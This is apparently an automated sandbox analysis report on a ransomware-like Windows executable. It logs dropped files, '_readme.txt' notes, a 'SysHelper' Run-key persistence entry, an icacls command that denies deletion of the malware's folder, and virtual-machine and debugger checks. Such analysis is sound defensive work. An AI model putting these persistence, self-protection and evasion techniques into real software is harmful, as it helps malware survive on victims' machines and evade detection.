                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.vapo source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\< source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\les\\\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333695957.000000000468A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\#8 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00482220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00482220
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00498565 push ecx; ret 0_2_00498578
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00498565 push ecx; ret 2_2_00498578
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E48565 push ecx; ret 3_2_00E48578
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E48565 push ecx; ret 4_2_00E48578
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.vapo (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct3D66.tmp.vapo (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Temp\wctF86A.tmpJump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Temp\wct3D66.tmpJump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeJump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004F1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_004F1920
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStalling execution: Execution stalls by calling Sleepgraph_3-41176
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStalling execution: Execution stalls by calling Sleepgraph_2-41476
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00471178 rdtsc 0_2_00471178
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004F1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_004F1920
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,0_2_0047E670
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0047E670
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,3_2_00E2E670
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,4_2_00E2E670
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeThread delayed: delay time: 1200000Jump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.vapo (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct3D66.tmp.vapo (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmpJump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct3D66.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeEvaded block: after key decision
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-38847
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeAPI coverage: 6.2 %
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe TID: 5924Thread sleep time: -1200000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe TID: 2500Thread sleep count: 167 > 30Jump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00480160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00480160
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_0047F730
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_0047FB98
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0047F730
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_00480160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00480160
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_0047FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0047FB98
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E2F730
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E30160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E30160
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E2FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00E2FB98
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E30160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E30160
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E2F730
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,4_2_00E2FB98
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeThread delayed: delay time: 1200000Jump to behavior
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.0000000000913000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.0000000001355000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001354000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.0000000001354000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.00000000013D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeAPI call chain: ExitProcess graph end nodegraph_0-38849
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00471178 rdtsc 0_2_00471178
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00494168 _memset,IsDebuggerPresent,0_2_00494168
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0049A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0049A57A
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004F1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_004F1920
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00482220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00482220
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004978D5 GetProcessHeap,0_2_004978D5
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004A29EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004A29EC
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004A29BB SetUnhandledExceptionFilter,0_2_004A29BB
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004A29EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004A29EC
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 2_2_004A29BB SetUnhandledExceptionFilter,2_2_004A29BB
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E529EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00E529EC
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 3_2_00E529BB SetUnhandledExceptionFilter,3_2_00E529BB
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E529EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00E529EC
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E529BB SetUnhandledExceptionFilter,4_2_00E529BB
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeProcess created: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe "C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00471000 cpuid 0_2_00471000
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_004A8178
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_004B0116
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004A82A2
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_004A834F
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_004A8423
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: EnumSystemLocalesW,0_2_004A87C8
